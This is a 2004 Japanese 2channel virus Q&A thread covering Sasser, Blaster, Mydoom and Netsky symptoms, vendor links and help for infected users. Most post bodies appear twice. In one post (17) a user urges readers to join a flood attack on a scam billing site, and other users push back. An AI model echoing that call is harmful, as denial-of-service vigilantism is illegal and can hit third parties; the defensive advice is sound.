ウィルス情報&質問 総合スレッド☆Part24
1 :名無しさん@お腹いっぱい。:
ウィルスに関わる話題・質問はこちら。
Winny関連のウィルスは、Download板に専門スレッドがあります。
テンプレサイト(質問する前、書き込む前に必読)
コンピュータウィルス総合スレッド テンプレミラーサイト(PC初心者板)
http://pcqa.tripod.co.jp/virus.htm
【警報】Winnyを狙ったワーム・ウイルス情報 テンプレまとめサイト(Download板)
http://www.geocities.jp/kemkzuenc/Antinny.html
テンプレの修正・加筆箇所は>>2-10あたり
前スレッド
ウィルス情報&質問 総合スレッド☆Part22(実質Part23)
http://pc5.2ch.net/test/read.cgi/sec/1091895881/
Winny関連のウィルスは、Download板に専門スレッドがあります。
テンプレサイト(質問する前、書き込む前に必読)
コンピュータウィルス総合スレッド テンプレミラーサイト(PC初心者板)
http://pcqa.tripod.co.jp/virus.htm
【警報】Winnyを狙ったワーム・ウイルス情報 テンプレまとめサイト(Download板)
http://www.geocities.jp/kemkzuenc/Antinny.html
テンプレの修正・加筆箇所は>>2-10あたり
前スレッド
ウィルス情報&質問 総合スレッド☆Part22(実質Part23)
http://pc5.2ch.net/test/read.cgi/sec/1091895881/
|
|
|
2 :名無しさん@お腹いっぱい。:04/09/05 20:28
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。
最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。
■■ワクチンメーカーリンク集■■ ※ウィルス監視ソフトをワクチンソフトとも呼びます。
・トレンドマイクロ株式会社 http://www.trendmicro.com/jp/home/personal.htm
製品名:ウイルスバスター2002、Inter Scan
・株式会社シマンテック http://www.symantec.com/region/jp/
製品名:NortonAntiVirus、NortonAntiVirus for Mac
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)
http://www.vintage-solutions.com/indexjpn.html
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
製品名:InocuLAN、CheyenneAntiVirus
・日本ネットワークアソシエイツ株式会社 http://www.nai.com/japan/
製品名:McAfee VirusScan 、GroupShield
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
該当する場合は諦めてノートンかウィルスバスターを買いましょう。
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。
最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。
■■ワクチンメーカーリンク集■■ ※ウィルス監視ソフトをワクチンソフトとも呼びます。
・トレンドマイクロ株式会社 http://www.trendmicro.com/jp/home/personal.htm
製品名:ウイルスバスター2002、Inter Scan
・株式会社シマンテック http://www.symantec.com/region/jp/
製品名:NortonAntiVirus、NortonAntiVirus for Mac
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)
http://www.vintage-solutions.com/indexjpn.html
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
製品名:InocuLAN、CheyenneAntiVirus
・日本ネットワークアソシエイツ株式会社 http://www.nai.com/japan/
製品名:McAfee VirusScan 、GroupShield
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
該当する場合は諦めてノートンかウィルスバスターを買いましょう。
3 :名無しさん@お腹いっぱい。:04/09/05 20:28
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
http://www.ipa.go.jp/security/outline/todokede-j.html
こちらに届け出の方法などが記載されています。
E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
★ウィルス監視ソフトを常駐させよう。
→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
http://www.ipa.go.jp/security/outline/todokede-j.html
こちらに届け出の方法などが記載されています。
E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
4 :名無しさん@お腹いっぱい。:04/09/05 20:29
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。ランダムに選択された
IPアドレスを持つコンピュータを走査し、拡散します。亜種も出現しているので、
出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、
ウイルススキャンで検出できません。最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、
メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.asp
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
このウイルスは、MS04-011 の悪用を試みるワームです。ランダムに選択された
IPアドレスを持つコンピュータを走査し、拡散します。亜種も出現しているので、
出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、
ウイルススキャンで検出できません。最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、
メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.asp
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
5 :名無しさん@お腹いっぱい。:04/09/05 20:29
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
6 :名無しさん@お腹いっぱい。:04/09/05 20:29
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
* Mail Delivery System (<受取人メールアドレス>)
* Failure (<受取人メールアドレス>)
* Delivered Message (<受取人メールアドレス>)
* Deliver Mail (<受取人メールアドレス>)
* Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
例: date7386.pif 、 message19392.zip など
「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
* Error
* Status
* Server Report
* Mail Transaction Failed
* Mail Delivery System
* hello
* hi
[ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
"test"
"The message contains Unicode characters and has been sent as a binary attachment."
"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
"Mail transaction failed. Partial message is available."
[ 任意の文字列 ] [ 空白 ]
・添付ファイル名: ランダムなアルファベット
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
* Mail Delivery System (<受取人メールアドレス>)
* Failure (<受取人メールアドレス>)
* Delivered Message (<受取人メールアドレス>)
* Deliver Mail (<受取人メールアドレス>)
* Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
例: date7386.pif 、 message19392.zip など
「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
* Error
* Status
* Server Report
* Mail Transaction Failed
* Mail Delivery System
* hello
* hi
[ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
"test"
"The message contains Unicode characters and has been sent as a binary attachment."
"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
"Mail transaction failed. Partial message is available."
[ 任意の文字列 ] [ 空白 ]
・添付ファイル名: ランダムなアルファベット
7 :名無しさん@お腹いっぱい。:04/09/05 20:34
「がいしゅつです」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8
Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp
Q3.「世界の中心で生まれてきてすいません」という表示が出てきました
デスクトップの背景が蓮画像になってしまいます
A3.Winny関連ウィルスですので、Download板へどうぞ。
ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
【警報】Winnyを狙ったワーム・ウイルス情報 Part25
http://tmp4.2ch.net/test/read.cgi/download/1093270545/
Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part3
http://pc5.2ch.net/test/read.cgi/sec/1094319700/
Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイト見たら・・・助けて下さい!Part39
http://pc6.2ch.net/test/read.cgi/pcqa/1093816017/
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8
Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp
Q3.「世界の中心で生まれてきてすいません」という表示が出てきました
デスクトップの背景が蓮画像になってしまいます
A3.Winny関連ウィルスですので、Download板へどうぞ。
ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
【警報】Winnyを狙ったワーム・ウイルス情報 Part25
http://tmp4.2ch.net/test/read.cgi/download/1093270545/
Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part3
http://pc5.2ch.net/test/read.cgi/sec/1094319700/
Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイト見たら・・・助けて下さい!Part39
http://pc6.2ch.net/test/read.cgi/pcqa/1093816017/
8 :名無しさん@お腹いっぱい。:04/09/05 20:38
過去スレ
Part1 http://pc.2ch.net/sec/kako/1010/10109/1010948022.html
Part2 http://pc.2ch.net/sec/kako/1016/10168/1016863569.html
Part3 http://pc.2ch.net/sec/kako/1020/10206/1020696417.html
Part4 http://pc.2ch.net/sec/kako/1024/10240/1024061532.html
Part5 http://pc.2ch.net/sec/kako/1027/10273/1027397623.html
Part6 http://pc.2ch.net/sec/kako/1031/10317/1031796923.html
Part7 http://pc.2ch.net/sec/kako/1035/10354/1035401865.html
Part8 http://pc.2ch.net/test/read.cgi/sec/1039859073/
Part9 http://pc.2ch.net/test/read.cgi/sec/1045816526/
Part10 http://pc.2ch.net/test/read.cgi/sec/1051155882/
Part11 http://pc.2ch.net/test/read.cgi/sec/1056101401/
Part12 http://pc.2ch.net/test/read.cgi/sec/1060186382/
Part13 http://pc.2ch.net/test/read.cgi/sec/1061454729/
Part14 http://pc.2ch.net/test/read.cgi/sec/1064028518/
Part15 http://pc.2ch.net/test/read.cgi/sec/1068311899/
Part16 http://pc3.2ch.net/test/read.cgi/sec/1077539309/
Part17 http://pc3.2ch.net/test/read.cgi/sec/1080552371/
Part18 http://pc5.2ch.net/test/read.cgi/sec/1081735712/
Part19 http://pc5.2ch.net/test/read.cgi/sec/1083586576/
Part20 http://pc5.2ch.net/test/read.cgi/sec/1086098775/
Part21 http://pc5.2ch.net/test/read.cgi/sec/1087695514/
Part22 http://pc5.2ch.net/test/read.cgi/sec/1089171169/
Part23 http://pc5.2ch.net/test/read.cgi/sec/1091895881/
Part1 http://pc.2ch.net/sec/kako/1010/10109/1010948022.html
Part2 http://pc.2ch.net/sec/kako/1016/10168/1016863569.html
Part3 http://pc.2ch.net/sec/kako/1020/10206/1020696417.html
Part4 http://pc.2ch.net/sec/kako/1024/10240/1024061532.html
Part5 http://pc.2ch.net/sec/kako/1027/10273/1027397623.html
Part6 http://pc.2ch.net/sec/kako/1031/10317/1031796923.html
Part7 http://pc.2ch.net/sec/kako/1035/10354/1035401865.html
Part8 http://pc.2ch.net/test/read.cgi/sec/1039859073/
Part9 http://pc.2ch.net/test/read.cgi/sec/1045816526/
Part10 http://pc.2ch.net/test/read.cgi/sec/1051155882/
Part11 http://pc.2ch.net/test/read.cgi/sec/1056101401/
Part12 http://pc.2ch.net/test/read.cgi/sec/1060186382/
Part13 http://pc.2ch.net/test/read.cgi/sec/1061454729/
Part14 http://pc.2ch.net/test/read.cgi/sec/1064028518/
Part15 http://pc.2ch.net/test/read.cgi/sec/1068311899/
Part16 http://pc3.2ch.net/test/read.cgi/sec/1077539309/
Part17 http://pc3.2ch.net/test/read.cgi/sec/1080552371/
Part18 http://pc5.2ch.net/test/read.cgi/sec/1081735712/
Part19 http://pc5.2ch.net/test/read.cgi/sec/1083586576/
Part20 http://pc5.2ch.net/test/read.cgi/sec/1086098775/
Part21 http://pc5.2ch.net/test/read.cgi/sec/1087695514/
Part22 http://pc5.2ch.net/test/read.cgi/sec/1089171169/
Part23 http://pc5.2ch.net/test/read.cgi/sec/1091895881/
9 :名無しさん@お腹いっぱい。:04/09/05 20:41
関連スレッド
コンピュータウィルス総合スレッド VOL.40
http://pc6.2ch.net/test/read.cgi/pcqa/1092168060/
【初心者向】ウイルス対策ソフト質問スレ part3
http://pc6.2ch.net/test/read.cgi/pcqa/1086590699/
【警報】Winnyを狙ったワーム・ウイルス情報 Part23
http://tmp4.2ch.net/test/read.cgi/download/1091063187/
sasser【スタコラサッサ】sasser Part2
http://pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc5.2ch.net/test/read.cgi/sec/1065964513/
【差出人】WORM_NETSKY【詐称】
http://pc5.2ch.net/test/read.cgi/sec/1080741342/
「Nimda !! 」【その4】
http://pc5.2ch.net/test/read.cgi/sec/1001864573/
コンピュータウィルス総合スレッド VOL.40
http://pc6.2ch.net/test/read.cgi/pcqa/1092168060/
【初心者向】ウイルス対策ソフト質問スレ part3
http://pc6.2ch.net/test/read.cgi/pcqa/1086590699/
【警報】Winnyを狙ったワーム・ウイルス情報 Part23
http://tmp4.2ch.net/test/read.cgi/download/1091063187/
sasser【スタコラサッサ】sasser Part2
http://pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc5.2ch.net/test/read.cgi/sec/1065964513/
【差出人】WORM_NETSKY【詐称】
http://pc5.2ch.net/test/read.cgi/sec/1080741342/
「Nimda !! 」【その4】
http://pc5.2ch.net/test/read.cgi/sec/1001864573/
10 :名無しさん@お腹いっぱい。:04/09/05 20:56
ダークロリータが出てきて速攻消したんですけど大丈夫ですか?
11 :名無しさん@お腹いっぱい。:04/09/05 20:58
>>10
不安ならアンチウィルスソフトでスキャンすればいいだろ。終了
不安ならアンチウィルスソフトでスキャンすればいいだろ。終了
12 :名無しさん@お腹いっぱい。:04/09/05 21:47
>>1は都昆布
13 :名無しさん@お腹いっぱい。:04/09/06 01:28
パソにあんまり詳しくないものですが、ここ2,3日に約30通以上の
ウィルスつきのメールが送られて来てます。
ウィルスバスターで隔離していますが、メールチェックのたびに送られてきていて
これはなんなんでしょうか?
ウィルスつきのメールが送られて来てます。
ウィルスバスターで隔離していますが、メールチェックのたびに送られてきていて
これはなんなんでしょうか?
14 :名無しさん@お腹いっぱい。:04/09/06 01:31
>>13
貴方のメアドを登録している知人か誰かのPCがウイルスに感染してしまった。
貴方のメアドを登録している知人か誰かのPCがウイルスに感染してしまった。
15 :名無しさん@お腹いっぱい。:04/09/06 01:40
>14
その人が気づくまで永遠に送られてくるのでしょうか??
その人が気づくまで永遠に送られてくるのでしょうか??
16 :名無しさん@お腹いっぱい。:04/09/06 02:05
>>15
はい
はい
17 :名無しさん@お腹いっぱい。:04/09/06 02:17
【祭りのヨカーン】詐欺行為の悪質サイト潰し★3
http://news13.2ch.net/test/read.cgi/news/1094395950/l50
このスレのトップにあるURLを踏むと
>登録しますた。
>15000円の使用料を払ってください。
>個人情報を取得しましたので支払いが無い場合催促しに行きます等の文章とともに銀行の口座番号が表示されます。
これは俗にワンクリック登録などという詐欺行為で金を稼ぐ架空請求です。
今ニュー速板住人が田代砲で爆撃中。落ちたかと思えば復活する難攻不落のサイトとのこと。
協力求む「弾幕薄いぞ何やってんの!!」
http://news13.2ch.net/test/read.cgi/news/1094395950/l50
このスレのトップにあるURLを踏むと
>登録しますた。
>15000円の使用料を払ってください。
>個人情報を取得しましたので支払いが無い場合催促しに行きます等の文章とともに銀行の口座番号が表示されます。
これは俗にワンクリック登録などという詐欺行為で金を稼ぐ架空請求です。
今ニュー速板住人が田代砲で爆撃中。落ちたかと思えば復活する難攻不落のサイトとのこと。
協力求む「弾幕薄いぞ何やってんの!!」
18 :名無しさん@お腹いっぱい。:04/09/06 02:28
>>17
お楽しみに水差して悪いけど、コレって銀行口座までわかってんだから
警察と銀行に通報した方が早くね?うまくすりゃ口座閉鎖に持っていけ
るだろうし。どうせどっかの厨から買った口座だろうから、また変えて
復活するだろうけどさ。
お楽しみに水差して悪いけど、コレって銀行口座までわかってんだから
警察と銀行に通報した方が早くね?うまくすりゃ口座閉鎖に持っていけ
るだろうし。どうせどっかの厨から買った口座だろうから、また変えて
復活するだろうけどさ。
19 :名無しさん@お腹いっぱい。:04/09/06 02:35
あぁ後「この板ではアタック依頼は受け付けません。」ってことらしいし・・・。
20 :いなむらきよし:04/09/06 02:38
大地震とかの災害の時には誰が奇形を守ってくれるのかキケー!
21 :あああ:04/09/06 02:46
メール送信していないのに、大量の発信メッセージのウィルスチェックポップアップがでます。
まさに下記症状なのですが、対策ございますか?
http://security.okweb.jp/kotaeru.php3?q=927048
XP、ノートンアンチウィルス・インターネットセキュリティ2002
パターンファイルは最新。Ad-aware等も効果なし。
踏み台ってやつっすかねー?
まさに下記症状なのですが、対策ございますか?
http://security.okweb.jp/kotaeru.php3?q=927048
XP、ノートンアンチウィルス・インターネットセキュリティ2002
パターンファイルは最新。Ad-aware等も効果なし。
踏み台ってやつっすかねー?
22 :名無しさん@お腹いっぱい。:04/09/06 07:54
ラッキーじゃん!苦労せずにメル鯖立てるなんて
23 :名無しさん@お腹いっぱい。:04/09/06 09:56
24 :名無しさん@お腹いっぱい。:04/09/06 13:49
すいません、質問させてください
インターネットに繋いだ途端に、コマンドコロンプトみたいなのが一瞬だけ表示され
すぐに消えます。(しかも複数)
これはトロイに感染されていると考えてもよろしいのでしょうか?
毎回ネットに繋ぐと、常駐ソフトが反応し駆除してるのですが、またネットにつなぎなおすと感染してるようなんです。
インターネットに繋いだ途端に、コマンドコロンプトみたいなのが一瞬だけ表示され
すぐに消えます。(しかも複数)
これはトロイに感染されていると考えてもよろしいのでしょうか?
毎回ネットに繋ぐと、常駐ソフトが反応し駆除してるのですが、またネットにつなぎなおすと感染してるようなんです。
25 :名無しさん@お腹いっぱい。:04/09/06 15:05
>>24
ルータなりファイヤーウォールなり入れろ。
ルータなりファイヤーウォールなり入れろ。
26 :名無しさん@お腹いっぱい。:04/09/06 15:07
28 :名無しさん@お腹いっぱい。:04/09/06 18:54
>>26
スキャンして、感染しているので駆除し、またネットにつなぎなおした途端にまた同じ症状になるのです。
スキャンして、感染しているので駆除し、またネットにつなぎなおした途端にまた同じ症状になるのです。
29 :名無しさん@お腹いっぱい。:04/09/06 18:57
>>28
使っているアンチウィルスソフトは?
他のアンチトロイウェアソフトは試してみた?他の会社のオンラインスキャンは?
何ていうウィルスに感染してるの?
その辺を書かなきゃエスパーじゃなきゃわかるわけないだろ。
使っているアンチウィルスソフトは?
他のアンチトロイウェアソフトは試してみた?他の会社のオンラインスキャンは?
何ていうウィルスに感染してるの?
その辺を書かなきゃエスパーじゃなきゃわかるわけないだろ。
30 :名無しさん@お腹いっぱい。:04/09/06 19:35
友人のPCがSasserに感染していました。
テンプレのようにしてカウントダウンは止めたんですが、
その後はまずどうすれば良いのでしょう?
友人のPCはほとんど買ったままの状態で、
セキュリティソフト、アンチウィルスソフト等は入っていません。
テンプレのようにしてカウントダウンは止めたんですが、
その後はまずどうすれば良いのでしょう?
友人のPCはほとんど買ったままの状態で、
セキュリティソフト、アンチウィルスソフト等は入っていません。
31 :名無しさん@お腹いっぱい。:04/09/06 19:42
32 :名無しさん@お腹いっぱい。:04/09/06 19:46
33 :名無しさん@お腹いっぱい。:04/09/06 19:52
>>32
ttp://www.trendmicro.com/search/google/ja-jp/results.asp?lr=lang_ja-jp&q=sasser
とりあえずオンラインスキャンしてみれ
ttp://www.trendmicro.com/search/google/ja-jp/results.asp?lr=lang_ja-jp&q=sasser
とりあえずオンラインスキャンしてみれ
34 :MyDoom被害経験者(当時は深刻):04/09/06 23:28
>24
ボクのPCもOnSrvr.exeとShrnkwrp.exeがしきりに
ttp:/ads.onwebmedia.comにアクセスをしようとしているんです。
何回か許せば気が済むかな?と思ったら今でも何回もしつこいです。
Spybotがこれを検出してくれないので、悲しいです。はい。
今も何かのネットワークアクセスに忙しいようで、PCの処理がとっても
重いです。駆除し切れなかった歴代のワームが今夜も活発に暴れている
のかもしれません。
ボクのPCもOnSrvr.exeとShrnkwrp.exeがしきりに
ttp:/ads.onwebmedia.comにアクセスをしようとしているんです。
何回か許せば気が済むかな?と思ったら今でも何回もしつこいです。
Spybotがこれを検出してくれないので、悲しいです。はい。
今も何かのネットワークアクセスに忙しいようで、PCの処理がとっても
重いです。駆除し切れなかった歴代のワームが今夜も活発に暴れている
のかもしれません。
35 :名無しさん@お腹いっぱい。:04/09/06 23:43
>>34
ググったら速攻で情報出てくるじゃん。トロイの木馬だよ。
http://www.symantec.com/region/jp/avcenter/venc/data/trojan.download.chekin.html
OnSrvr.exe
http://www.liutilities.com/products/wintaskspro/processlibrary/onsrvr/
Security Risk ( Virus/Trojan/Worm/Adware/Spyware ): Yes
ちゃんとアンチウィルスソフトは入れておけ。
Spybotだけじゃなく、Ad-awareSEやCWShredderで駆除しろ。
アンチトロイソフトも試してみろ。
ググったら速攻で情報出てくるじゃん。トロイの木馬だよ。
http://www.symantec.com/region/jp/avcenter/venc/data/trojan.download.chekin.html
OnSrvr.exe
http://www.liutilities.com/products/wintaskspro/processlibrary/onsrvr/
Security Risk ( Virus/Trojan/Worm/Adware/Spyware ): Yes
ちゃんとアンチウィルスソフトは入れておけ。
Spybotだけじゃなく、Ad-awareSEやCWShredderで駆除しろ。
アンチトロイソフトも試してみろ。
36 :名無しさん@お腹いっぱい。:04/09/06 23:44
37 :名無しさん@お腹いっぱい。:04/09/06 23:47
38 :30:04/09/07 01:36
どうやら私が思ってた以上に症状はひどいようでした。
カウントダウンは止まるのですが、
インターネットに繋げなくなりました。
その他、アプリケーションの起動が出来なくなり
「デスクトップの更新」をするとほとんどのアイコンがデスクトップから消え、
削除されているなど、どうしようもない状態。
このスレの人ならこの状態になった時はどうするのですか?
私は友人と考えたのですが、何も思いつきませんでした。
カウントダウンは止まるのですが、
インターネットに繋げなくなりました。
その他、アプリケーションの起動が出来なくなり
「デスクトップの更新」をするとほとんどのアイコンがデスクトップから消え、
